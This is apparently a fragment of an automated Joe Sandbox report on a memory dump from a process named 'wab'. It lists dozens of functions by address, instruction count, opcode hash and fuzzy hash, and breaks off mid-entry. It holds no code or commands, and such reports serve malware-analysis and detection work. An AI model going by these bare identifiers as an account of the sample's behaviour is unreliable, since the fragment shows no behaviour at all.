                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2dbec9bfd0c7093bc7dcd4039ac5baf7f5dfef1f2c6c47151cab4ad3744f6c02
                                                            • Instruction ID: 1c9a95ba36401685f76a9d9f040e50fa19a91eacf1ae36480dc01c3e0ae97056
                                                            • Opcode Fuzzy Hash: 2dbec9bfd0c7093bc7dcd4039ac5baf7f5dfef1f2c6c47151cab4ad3744f6c02
                                                            • Instruction Fuzzy Hash: C0F08279A00348ABDB04EBA9D559E9EB7B4EF09704F140058F502EF380D974D9018758
                                                            Function 03620710 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                            • Instruction ID: 242b0bc8b5c4690feffdf9c5c827ad4e0b4b1d9b7fd63dce92385de0626cef5d
                                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                            • Instruction Fuzzy Hash: F2F0ED3E204B549BDB15CF19D140AE57FA8EB4A360F1500D8E8428B300EB36E982CF84
                                                            Function 036F37B6 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                            • Instruction ID: 1599b2860c4d0973180a533bca388cc06bede199cedf8338004f432e56ab483b
                                                            • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                            • Instruction Fuzzy Hash: E4E09276210200BFD764DB58CE05FE673ECEB01760F240258B215972D0DBB0BE40CB68
                                                            Function 036A4000 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                            • Instruction ID: 3166ed580baf6768eebb12e204f2aa9e7bbd9a213ddf2e91397c89b37dd6f1bc
                                                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                            • Instruction Fuzzy Hash: 17E0C2343007058FD716CF1AC540B62B7B6BFD5A10F28C068A8488F305EB72E842EB50
                                                            Function 036DB3D0 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                            • Instruction ID: b23a038599a3f603c22c47d9f61e796e0b2c06ac016f37276a8f42dab520fec4
                                                            • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                            • Instruction Fuzzy Hash: A7E0C235284214BBDB22AA40CC00F697B19DF507A0F218035FA08AFB94C675ACA2E6D8
                                                            Function 0361823B Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                            • Instruction ID: 56e1e1c71bb62c3302bae7b1dddd049985e2432f2f310c1772c90c8dfef39191
                                                            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                            • Instruction Fuzzy Hash: 23E08C35100A10EEDB32AE11DD10F51B6A5FB85B90F28486DE0811B1A486B4A892CA8C
                                                            Function 036A92BC Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b522a2897e9b0dfe02c8affa59e5d0f25ac17723c20a4a94a25eaed0d4361812
                                                            • Instruction ID: 60060f04a1a9a24398f347048efe7dfef35bec2735182011c3f80a57522564da
                                                            • Opcode Fuzzy Hash: b522a2897e9b0dfe02c8affa59e5d0f25ac17723c20a4a94a25eaed0d4361812
                                                            • Instruction Fuzzy Hash: 9BF0C235251B84CBE71ADF08C2E1B51B7B9FB86B40F604458D4468BBA1C73AAD42CE40
                                                            Function 03622050 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 55a5a6aed14a6ee69614d92d00a9ce046f2931e7150b13c2c9878b8df99105eb
                                                            • Instruction ID: 65a870859c7af77cf5925e65e2f64b1b55fb02412c63ff63e909d20a27126058
                                                            • Opcode Fuzzy Hash: 55a5a6aed14a6ee69614d92d00a9ce046f2931e7150b13c2c9878b8df99105eb
                                                            • Instruction Fuzzy Hash: 47E0C233201A606BC312FB5EDD10F4A779EEF95260F124229F5518B690CA24AC00CB98
                                                            Function 0361A0E3 Relevance: .0, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                            • Instruction ID: 37a22f96b4dcc76ca5e4294cdcd09212157744be3cfb6c2ccde14ba37fb5d6f5
                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                            • Instruction Fuzzy Hash: 2AD0223231303093CB28D690AA00F63A9059B82A94F1E002C340AD3A00C0088C53C2E0
                                                            Function 036302A0 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                            • Instruction ID: 7455b482f00aaf16e3ec5c844c471782cda9e5ade34e06c5f260becefcfbf13e
                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                            • Instruction Fuzzy Hash: 87D0C935216E80CFC61BCB0DC6A4F1573A8FB45B44F8504D0E402CBB21DA6CD944CA04
                                                            Function 036A930B Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                            • Instruction ID: 2ac87d4017c3e52657ab60a1ac10cfc2a82b4c64d6743cb1e4ff1a92a0fb67e3
                                                            • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                            • Instruction Fuzzy Hash: BDD01739941AC88FE727CB18C265B50BBF8F705B40F990098E0424BBA2C37C9D84CB40
                                                            Function 0365C700 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                            • Instruction ID: 3218b9634480c625ce78b97d122c7f4faf422d34386ad19573132a34f483d3cb
                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                            • Instruction Fuzzy Hash: 63C08C3B290748AFC712EF98CD01F027BA9EB99B40F100021F3048B670C635FC20EA88
                                                            Function 03640310 Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                            • Instruction ID: c9dd6a9296437f3f124cfcd625a6e00a6fef0781fb3d45af75c0143e28731fe2
                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                            • Instruction Fuzzy Hash: 18D01236100248EFCB02DF41C890D9ABB2AFBC8710F108019FD190B6108A31ED62DA50
                                                            Function 03620750 Relevance: .0, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                            • Instruction ID: e0541ca649ebf4e2b0efa921c32e3bc4fc260b3cb29a08dbaeaa5c238f08ced6
                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                            • Instruction Fuzzy Hash: 80C0487D701A418FCF15DB2AE394F5977E8FB45750F2918D0E805CBB21E628E805CA10
                                                            Function 03664340 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a347c2c8a8f01ad90bbcce09268bfba16f27ff3ab6cbf83f2f0612b35fd5fe9
                                                            • Instruction ID: 7cd64c80d4c396929c59284985f5b1212e0fe1c42b123ca167d6ea415516ceb7
                                                            • Opcode Fuzzy Hash: 5a347c2c8a8f01ad90bbcce09268bfba16f27ff3ab6cbf83f2f0612b35fd5fe9
                                                            • Instruction Fuzzy Hash: E9900231605804129140B5584889546400597E0301B95C121E0424654D8B548E565361
                                                            Function 03663010 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e83d116409f53f86002044de0ae8bb7ae81c08374c821d4815bfa540ac3b2bbb
                                                            • Instruction ID: 04e1c246609ebaf2a57e0f30b344ba4ed73f58d1bf91fc80e038cf2ee43e4a1e
                                                            • Opcode Fuzzy Hash: e83d116409f53f86002044de0ae8bb7ae81c08374c821d4815bfa540ac3b2bbb
                                                            • Instruction Fuzzy Hash: 7390022120184842D140B6584809B0F410587E1202FD5C129A4156654DCA558D555721
                                                            Function 03663090 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f408a6a93e881efcec2c70cc646cdc40d0eb2618e15a2263da23497095093927
                                                            • Instruction ID: 5a4d35e0461833d45b72fbc3a0869ebb18cfb942a7ec088d6dea65791973e598
                                                            • Opcode Fuzzy Hash: f408a6a93e881efcec2c70cc646cdc40d0eb2618e15a2263da23497095093927
                                                            • Instruction Fuzzy Hash: ED90022124140C02D140B55884197070006C7D0601F95C121A0024654E87568E6566B1
                                                            Function 03664650 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4001ffdb74b704354b097327e2a6095bb26c1c52f589a28b764e51b91d37983e
                                                            • Instruction ID: ff7495ae1fa30a2ae152abf72d37017cae8f51ebfdb724f5a9168c44f235fc50
                                                            • Opcode Fuzzy Hash: 4001ffdb74b704354b097327e2a6095bb26c1c52f589a28b764e51b91d37983e
                                                            • Instruction Fuzzy Hash: BB900261601504424140B5584809406600597E13013D5C225A0554660D87588D559269
                                                            Function 03662BE0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b1ecfc72d541a82a052957b95f128a03e6815b8253cf3783bb015dd80a57672
                                                            • Instruction ID: 96dbbb3790e46db158bbf8b7303035c01360aa67f4d23e10d77a20145cb7a27d
                                                            • Opcode Fuzzy Hash: 7b1ecfc72d541a82a052957b95f128a03e6815b8253cf3783bb015dd80a57672
                                                            • Instruction Fuzzy Hash: 9A90023120544C42D140B5584409A46001587D0305F95C121A0064794E97658E55B661
                                                            Function 03662BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ebce7f486fd93763bf345e163d0fd18d206ebe75ad828cbdde2b3d24fd84f74b
                                                            • Instruction ID: 8955567532c54a6d78cf0dfedeecddabbe9b13662449c1b7af3c910ce1e57b55
                                                            • Opcode Fuzzy Hash: ebce7f486fd93763bf345e163d0fd18d206ebe75ad828cbdde2b3d24fd84f74b
                                                            • Instruction Fuzzy Hash: 1A90023120140C02D180B558440964A000587D1301FD5C125A0025754ECB558F5977A1
                                                            Function 03662BA0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6769e8d110772ae23a0fcfc8915b65049e59a62e4d3215b516ed5ce9d6c0ec27
                                                            • Instruction ID: cde0bc0683c7e4d596013cd3042262fb094ddb97b1e40bd17173f0d2b99024ad
                                                            • Opcode Fuzzy Hash: 6769e8d110772ae23a0fcfc8915b65049e59a62e4d3215b516ed5ce9d6c0ec27
                                                            • Instruction Fuzzy Hash: DE90023160540C02D150B5584419746000587D0301F95C121A0024754E87958F5576A1
                                                            Function 03662B80 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6591d2a7f42a0e2adff6fb92a4f7d9f99785be8ef7d26c6a5055b891a3b41234
                                                            • Instruction ID: ffd904e378702490db21baecf1e59ee064bb8dfe7e3582f636a367c169c6cb94
                                                            • Opcode Fuzzy Hash: 6591d2a7f42a0e2adff6fb92a4f7d9f99785be8ef7d26c6a5055b891a3b41234
                                                            • Instruction Fuzzy Hash: 7290023120140C02D104B5584809686000587D0301F95C121A6024755F97A58D917131
                                                            Function 03662AF0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6bb07146f40d9ceb79502e133fb7646982d51cfc0653883202c92247a8e71d3d
                                                            • Instruction ID: 88d9841d6297596838f56c127577009ff8ccbd5e083d384b741d6be6525763c3
                                                            • Opcode Fuzzy Hash: 6bb07146f40d9ceb79502e133fb7646982d51cfc0653883202c92247a8e71d3d
                                                            • Instruction Fuzzy Hash: C2900225221404020145F958060950B044597D63513D5C125F1416690DC7618D655321
                                                            Function 03662AD0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 499920a2dd5a9e1f5d17cbc41b6f1c210a13cc114a98e3c41d0226f23bc57630
                                                            • Instruction ID: 4c3eb529bec40a6b46ea28781fab3a866345b306fe502ca52e76bd8dd97c925b
                                                            • Opcode Fuzzy Hash: 499920a2dd5a9e1f5d17cbc41b6f1c210a13cc114a98e3c41d0226f23bc57630
                                                            • Instruction Fuzzy Hash: E9900435311404030105FD5C070D5070047C7D53513D5C131F1015750DD771CD715131
                                                            Function 03662AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 46c840b298e8987280ed6105628c22246ba631bfa8656ba4608dedb18af30a9b
                                                            • Instruction ID: 902d74cb668b67fc6d51fda8bc67d60430d188b02514c2dbe7ebabf8ce89e00f
                                                            • Opcode Fuzzy Hash: 46c840b298e8987280ed6105628c22246ba631bfa8656ba4608dedb18af30a9b
                                                            • Instruction Fuzzy Hash: 0B9002A1201544924500F6588409B0A450587E0201B95C126E1054660DC6658D519135
                                                            Function 036639B0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a07660bd76f62ada9976838dbd55012fd57e42e99d45405ebde71a6237c65121
                                                            • Instruction ID: dcc621e3e2919ce521bda653cf0de9e8ec41a23f52227d717b063edaf7bb7c68
                                                            • Opcode Fuzzy Hash: a07660bd76f62ada9976838dbd55012fd57e42e99d45405ebde71a6237c65121
                                                            • Instruction Fuzzy Hash: 0990022124545502D150B55C44096164005A7E0201F95C131A0814694E86958D556221
                                                            Function 03662F60 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0913ee7099932d3994960a6d81b9f78a5e7311fc3f236f1524e858faa8f28e14
                                                            • Instruction ID: 577abe7b2efb8ed5b3bb735a38ad5473036475ac613fcee9829bb0f0f36aef09
                                                            • Opcode Fuzzy Hash: 0913ee7099932d3994960a6d81b9f78a5e7311fc3f236f1524e858faa8f28e14
                                                            • Instruction Fuzzy Hash: 6D90026121140442D104B5584409706004587E1201F95C122A2154654DC6698D615125
                                                            Function 03662F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2051025142d10cfe37765890bf157b3cb9af57e6d4d9891248a95975b13cdd3f
                                                            • Instruction ID: 1d4c235a54800963d111c18220a113d0b993339c3a36fc0139ef8ce1e78bd566
                                                            • Opcode Fuzzy Hash: 2051025142d10cfe37765890bf157b3cb9af57e6d4d9891248a95975b13cdd3f
                                                            • Instruction Fuzzy Hash: 1290026134140842D100B5584419B060005C7E1301F95C125E1064654E8759CD526126
                                                            Function 03662FE0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d07f95c4f289f468a55d56b2624d9f52394979ac532b240756de66a762fc61f4
                                                            • Instruction ID: b7e15655c5af05d9cb4e8247748380413877b04aa70262a651d0fd4c48ea9a40
                                                            • Opcode Fuzzy Hash: d07f95c4f289f468a55d56b2624d9f52394979ac532b240756de66a762fc61f4
                                                            • Instruction Fuzzy Hash: F8900221211C0442D200B9684C19B07000587D0303F95C225A0154654DCA558D615521
                                                            Function 03662FA0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b882d974a3a17be135b7f1fe6ab78774b511491a75d483d82b8477e1f8eec3d7
                                                            • Instruction ID: 8e1620abf9913f3047b6890dc9d73ad65025f16d723798ca33a075bba1550738
                                                            • Opcode Fuzzy Hash: b882d974a3a17be135b7f1fe6ab78774b511491a75d483d82b8477e1f8eec3d7
                                                            • Instruction Fuzzy Hash: 0990023120180802D100B558480D747000587D0302F95C121A5164655F87A5CD916531
                                                            Function 03662FB0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50ef444477217c1b5a0a569248b24762e7ac07c5b2824f60abf2c9b3edd82179
                                                            • Instruction ID: a037514c409b3895c1451de2f840d8d4174d9867ddff6c8132153185f4a06d09
                                                            • Opcode Fuzzy Hash: 50ef444477217c1b5a0a569248b24762e7ac07c5b2824f60abf2c9b3edd82179
                                                            • Instruction Fuzzy Hash: 68900221601404424140B56888499064005ABE1211795C231A0998650E86998D655665
                                                            Function 03662F90 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 074947c55878811a24dcf378f8d4bc1695a21ecd064007af7fda64d4f749ac19
                                                            • Instruction ID: eafac23190f3bb237479d96beccf79aa67ac8d42c21bf9193e414f20d635a70f
                                                            • Opcode Fuzzy Hash: 074947c55878811a24dcf378f8d4bc1695a21ecd064007af7fda64d4f749ac19
                                                            • Instruction Fuzzy Hash: 0E90023120180802D100B558481970B000587D0302F95C121A1164655E87658D516571
                                                            Function 03662E30 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9e1cdc5b9502a09ffeb0773bbc725db7b81b99687e9ab44ee0360ed4fdadd7f3
                                                            • Instruction ID: 56b6c691231a82605b4cec4270dff1a21859b7420ee0f32f34ed92cd9adbbdc5
